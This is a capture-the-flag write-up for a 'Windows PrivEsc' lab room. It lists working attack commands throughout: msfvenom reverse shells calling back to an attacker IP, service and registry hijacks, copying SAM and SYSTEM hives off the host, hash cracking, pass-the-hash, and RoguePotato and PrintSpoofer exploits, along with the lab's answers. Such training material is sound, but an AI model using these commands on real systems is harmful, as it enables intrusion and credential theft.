Windows PrivEsc

This guide contains the answer and steps necessary to get to them for the Windows PrivEsc room.

Table of contents

• Generate a Reverse Shell Executable
• Service Exploits - Insecure Service Permissions
• Service Exploits - Unquoted Service Path
• Service Exploits - Weak Registry Permissions
• Service Exploits - Insecure Service Executables
• Registry - AutoRuns
• Registry - AlwaysInstallElevated
• Passwords - Registry
• Passwords - Saved Creds
• Passwords - Security Account Manager (SAM)
• Passwords - Passing the Hash
• Scheduled Tasks
• Insecure GUI Apps
• Startup Apps
• Token Impersonation - Rogue Potato
• Token Impersonation - PrintSpoofer
• Privilege Escalation Scripts

Deploy a Vulnerable Windows VM

Username: user

Password: password321

We can connection to the machine with various tools. I use Reminna in these examples, but you can also use xfreerdp.

xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.145.241

Generate a Reverse Shell Executable

Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!

First we will create a reverse shell executabel using msfvenom. We specifiy the attack machine ip and port and the file extension and name.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe -o reverse.exe

Now we must transfer this file over to our target machine. We can use an SMB server in this room. Don't forget the dot at the end.

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

Now we can copy over the file from our machine.

copy \\10.18.78.136\kali\reverse.exe "C:\PrivEsc\reverse.exe"

Then we set up a listener on our machine using Netcat.

nc -nlvp 1337

Finally we can execute the reverse shell from our target machine.

Service Exploits - Insecure Service Permissions

Now we are utilizing insecure service permissions to execute our reverse shell.

1. What is the original BINARY_PATH_NAME of the daclsvc service?

First we check the permissions that are set for the daclsvc service.

<Path to>\accesschk.exe /accepteula -uwcqv user daclsvc

It looks like we as user have permission to change the service configuration. Querying this service we see it runs as SYSTEM. The next image also contains the answer to our question.

sc qc daclsvc

Next we modify the service executable path to reflect our reverse shell.

sc config daclsvc binpath= "\"<Path to>\reverse.exe\""

Then we set up a listener on our machine using Netcat.

nc -nlvp 1337

Lastly we start the service.

net start daclsvc

Click for answer

C:\Program Files\DACL Service\daclservice.exe

Service Exploits - Unquoted Service Path

In this task we will use the unquotedsvc service to get our reverse shell.

1. What is the BINARY_PATH_NAME of the unquotedsvc service?

We first query the service configuration to see if it runs as SYSTEM.

sc qc unquotedsvc

Then we look for the available permissions for the folder it is located in.

<Path to>\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" 

Then we copy the reverse shell into this folder.

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

We must now set up a listerner on our machine.

nc -nlvp 1337

Lastly, we can start the service.

net start unquotedsvc

Click for answer

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Service Exploits - Weak Registry Permissions

In this task we will exploit a weak registry permission to execute our reverse shell.

Read and follow along with the above.

We first query the service configuration for the regsvc service.

sc qc regsvc

Then we check for any write permissions we may have.

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Looks like the service runs as SYSTEM and we have write access the the registry entries. Lets change them to run our reverse shell.

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Then we can start a listener on our machine.

nc -nlvp 1337

And lastly we run the service to esecute our reverse shell.

net start regsvc

Service Exploits - Insecure Service Executables

In this task we will utilize insecure executables to run our reverse shell.

Read and follow along with the above.

First we query the service configuration again to see what the service runs as.

sc qc filepermsvc

Then we check for the write permissions we have on the binary.

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Now we must copy over our reverse shell to replace the legit executable.

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

Now we set up a listener and start the service.

nc -nlvp 1337

net start filepermsvc

Registry - AutoRuns

In this task we will exploit the AutoRun service to run our reverse shell.

Read and follow along with the above.

We first query the registry keys to find the correct executable.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Next we can look for the permisstions we have on that executable.

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Since we have write access, we can copy the shell over into this folder.

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

We now set up a listener and wait for the reverse shell to execute. For this we need to restart (not terminate) the VM and log into it via RDP once more.

nc -nlvp 1337

Registry - AlwaysInstallElevated

In this task we will utilize the fact that sometimes, programs will get installed using an elevated installer.

Read and follow along with the above.

As before, we first query the registry related to this exploit to see if it is enabled (denoted by a 1).

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Now we must create a payload for us to send to the machine, which we can install to create a reverse shell with elevated priveleges. This we do with MSF Venom. This time, we make an msi file. Again, we must specify a port and our own ip address.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f msi -o reverse.msi

Next, we can us the smb server from before to transfer our file to the machine. Or we can set up a new one.

On our machine:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

On the target machine:

copy \\10.18.78.136\kali\reverse.msi "C:\PrivEsc\reverse.ms

The last step is to setup a listener on the specified port.

nc -nlvp 1337

Al that is left to do now, is to execute the installer and wait for the connection to be made.

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Passwords - Registry

In this task we will search the registry for any keys related to credentials. Unfortunately, as stated in the description, the password was not saved in the registry for me. So I had to use the supplied hint. However, I did perform all necessary steps that would have otherwise granted me the password.

1. What was the admin password you found in the registry?

To search the registry for a specific keyword, we can use the following command:

reg query /f password  /t REG_SZ

Since I couldn't find anything, I used the specific search string to directly query the necessary entry.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Unfortunately, I couldn't find the password here. So I used the supplied hint to create a connection to the target machine from our machine.

winexe -U 'admin%password123' //10.10.6.194 cmd.exe

Click for answer

password123

Passwords - Saved Creds

In this task we will exploit the fact that credentials are saved on the machine itself.

Read and follow along with the above.

For this question we will use cmdkey to get more info on the stored credentials. To list all stored credentials we can use:

cmdkey /list

Now we can run the reverse as we did before. However, this time it will be executed running as a user with elevated priveleges.

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Passwords - Security Account Manager (SAM)

In the SAM and SYSTEM files, user credential hashes are stored. If these are insecurely backed-up we might be able to copy these files and dump the hashes.

1. What is the NTLM hash of the admin user?

First setup an smb server if not already present on our machine.

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .     

Looking at the directory, we can indeed see the two backup files there.

Copy them to the attacking machine.

copy C:\Windows\Repair\SAM \\10.18.78.136\kali\SAM
copy C:\Windows\Repair\SYSTEM \\18.78.136.10\kali\SYSTEM

Use creddump7 to dump the hashes from these files using:

python3 /usr/share/creddump7/pwdump.py SYSTEM SAM

To find the passwords that belong to the hashes, we can put them in a file and use hashcat to crack them. For this part only the NLTM part is needed.

hashcat -m 1000 privesc.hash /usr/share/wordlists/rockyou.txt

Now we can log into the machine with the acquired credentials.

Click for answer

a9fdfa038c4b75ebc76dc855dd74f0da

Passwords - Passing the Hash

Like winexe we can log into the machine with pth-winexe. The difference here is that we can do so with only the NTLM hash.

Read and follow along with the above.

We use a similar command as with winexe. Here we must use both the LM as well as the NLTM part.

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.235.28 cmd.exe

Scheduled Tasks

In this task we will abuse scheduled tasks which have unnecessary permissions.

Read and follow along with the above.

We can look at the script using:

type C:\DevTools\CleanUp.ps1

Or by opening in from the GUI.

We can check our permission regarding this file with accesschk again.

accesschk /accepteula -quvw user C:\DevTools\CleanUp.ps1

Looks like we have write permission for this script. We can modify it through the GUI or CLI.

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

After modifying the script, we wait for the connection.

Insecure GUI Apps

In this task we will use GUI apps which are run with elevated priveleges to gain an elevated shell.

Read and follow along with the above.

Using the paint shortcut on the desktop we open Paint as an admin user. From the shortcut target, we can see that it uses the same technique as task 10 (saved creds).

After opening the file we can use Task Manager to check its user.

This can also be done with the CLI.

tasklist /V | findstr mspaint.exe

Now we can get an elevated shell by opening a file in Paint and typing the following:

file:\C:\Windows\system32\cmd.exe

Startup Apps

In this task we will utilize the priveleges given to startup apps when run from an admin account.

Read and follow along with the above.

We are first going to check the permissions we have for the startup folder using accesschk.exe.

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Looks like we have write permissions. Now we use the provided script and our uploaded reverse shell to create a startup shortcut to our reverse shell with admin priveleges.

cscript C:\PrivEsc\CreateShortcut.vbs

Then we set up a listener on our machine:

nc -nlvp 1337

Lastly, we log into the target machine with our admin credentials to simulate an admin logon. I am using Reminna for this, but you can also use rdesktop.

rdesktop -u admin 10.10.20.33

Token Impersonation - Rogue Potato

In this task we will use the RoguePotato exploit to gain a SYSTEM shell.

We must first set up a forwarder on our attack machine using socat.

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.20.33:9999

We then log into the machine with an admin account to simulate a Service account. We can create this by using:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Before that, we must set up a listener on our machine.

nc -nlvp 1337

In this shell we can now use the RoguePotato exploit to gain a SYSTEM shell.

C:\PrivEsc\RoguePotato.exe -r 10.18.78.136 -e "C:\PrivEsc\reverse.exe" -l 9999

Again, set up a listener before executing that command:

nc -nlvp 1337

1. Name one user privilege that allows this exploit to work.

I found this information on the following site. Otherwise, just Google it.

Click for answer

SeImpersonatePrivilege

1. Name the other user privilege that allows this exploit to work.

Same as the previous question.

Click for answer

SeAssignPrimaryTokenPrivilege

Token Impersonation - PrintSpoofer

In this task we will use PrintSpoofer exploit to gain a SYSTEM shell.

Read and follow along with the above.

First we set up a listener on our machine with:

nc -nlvp 1337

Then we log into the machine with our admin credentials to be able to simulation a Service account shell with the following command (uses our reverse shell executable):

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Now we set up another listener on our machine.

nc -nlvp 1337

Then in the acquired Service shell we can use the PrintSpoofer exploit to get a SYSTEM shell.

C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i 10.18.78.136 1337

Privilege Escalation Scripts

In this task we have several other tools which we are free to use.

Tools included: - winPEASany.exe GitHub link - Seatbelt.exe GitHub link - PowerUp.ps1 GitHub link - SharpUp.exe GitHub link

Experiment with all four tools, running them with different options. Do all of them identify the techniques used in this room?

WinPEAS can be used to find out all sorts of information on our target machine. We run it with:

.\winPEASany.exe -quiet > output.txt

We get a long list of things that is being looked for. We can see some of the vulnerabilities we have used in previous tasks such as the SAM and SYSTEM files or the alwaysinstallelevated registry key.

Seatbelt performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. We can run it using various commands:

Seatbelt.exe user
Seatbelt.exe system
Seatbelt.exe all

Again we find similar things as we found before with saved credentials.

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. After importing the module, we can run it using:

. .\PowerUp.ps1
Invoke-AllChecks

We see it lists some services we can abuse and their respective command to do so.

SharpUp is a C# port of various PowerUp functionality. We can run the executable with:

SharUp.exe audit